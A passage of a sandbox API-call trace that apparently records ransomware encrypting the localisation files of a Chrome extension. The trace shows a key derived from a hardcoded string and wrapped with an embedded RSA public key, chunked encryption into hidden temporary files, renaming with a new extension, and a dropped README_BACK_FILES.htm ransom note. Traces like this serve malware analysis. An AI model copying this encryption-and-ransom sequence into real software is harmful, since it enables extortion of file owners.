ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.363] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.363] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.363] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.363] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.363] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.364] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.364] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.364] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.364] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.364] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.364] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.364] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.364] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.364] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.364] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.364] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.364] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.364] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.364] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.364] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.365] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.365] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.365] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.365] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.365] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.365] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.365] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.365] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.365] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.365] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.365] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.365] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.365] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.365] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.365] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.366] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.366] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.366] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.366] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.366] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.366] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.366] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.366] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.366] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.366] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x13a, lpOverlapped=0x0) returned 1 [0263.366] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x13a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x140) returned 1 [0263.366] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x140, lpOverlapped=0x0) returned 1 [0263.366] CloseHandle (hObject=0x5d5c) returned 1 [0263.366] CloseHandle (hObject=0x5d60) returned 1 [0263.366] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), bFailIfExists=0) returned 1 [0263.370] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json", dwFileAttributes=0x0) returned 1 [0263.370] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.gsg")) returned 1 [0263.372] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.fuck")) returned 1 [0263.373] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.373] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.373] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.373] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.373] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.373] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\readme_back_files.htm")) returned 0xffffffff [0263.373] AreFileApisANSI () returned 1 [0263.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.373] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.374] GetFileType (hFile=0x5d64) returned 0x1 [0263.374] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.385] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.385] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0263.385] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.385] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.385] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.385] GetLastError () returned 0x0 [0263.385] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json")) returned 0x20 [0263.385] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json", dwFileAttributes=0x80) returned 1 [0263.386] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.387] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.388] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.389] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.391] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.391] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.391] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.391] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.391] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.391] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.391] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e74ef0) returned 1 [0263.391] CryptImportPublicKeyInfo (in: hCryptProv=0x2e74ef0, dwCertEncodingType=0x1, pInfo=0x2ead9d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eada00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eada08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e1c0) returned 1 [0263.391] CryptEncrypt (in: hKey=0x2e7e1c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.391] CryptEncrypt (in: hKey=0x2e7e1c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e755d8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e755d8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.392] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e755d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e755d8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.393] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.406] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.406] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.423] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.424] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.424] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.424] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.424] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.424] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.424] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.424] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.424] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, 